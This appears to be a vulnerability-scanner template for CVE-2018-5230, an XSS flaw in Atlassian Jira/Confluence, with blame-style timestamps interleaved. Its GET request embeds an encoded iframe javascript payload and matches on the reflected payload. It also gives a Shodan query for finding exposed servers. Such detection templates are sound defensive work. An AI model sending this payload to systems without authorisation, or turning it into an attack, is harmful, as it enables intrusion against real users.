2021-01-02 05:00:39 +00:00
id : CVE-2018-5230
2020-04-08 11:25:25 +00:00
info :
2022-08-12 00:45:50 +00:00
name : Atlassian Jira Confluence - Cross-Site Scripting
2020-04-08 11:25:25 +00:00
author : madrobot
2020-05-25 07:49:06 +00:00
severity : medium
2022-03-18 07:25:28 +00:00
description : |
2022-08-12 00:45:50 +00:00
Atlassian Jira Confluence before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4, and from version 7.9.0 before version 7.9.2, allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the error message of custom fields when an invalid value is specified.
2022-04-22 10:38:41 +00:00
reference :
- https://jira.atlassian.com/browse/JRASERVER-67289
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-5230
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-5230
cwe-id : CWE-79
2022-03-19 10:42:08 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-03-19 10:42:08 +00:00
shodan-query : http.component:"Atlassian Confluence"
2022-03-18 07:25:28 +00:00
tags : cve,cve2018,atlassian,confluence,xss
2020-04-08 11:25:25 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-04-08 11:25:25 +00:00
- method : GET
path :
2022-03-18 07:25:28 +00:00
- "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-08 11:25:25 +00:00
matchers :
- type : status
status :
2020-05-25 07:49:06 +00:00
- 200
2022-03-18 07:25:28 +00:00
2020-04-08 13:16:19 +00:00
- type : word
2020-04-08 11:25:25 +00:00
part : body
2022-03-18 07:25:28 +00:00
words :
- '<iframe src="javascript:alert(document.domain)">'
- 'confluence'
condition : and
- type : word
part : header
words :
2022-08-12 00:45:50 +00:00
- 'text/html'
# Enhanced by mp on 2022/08/11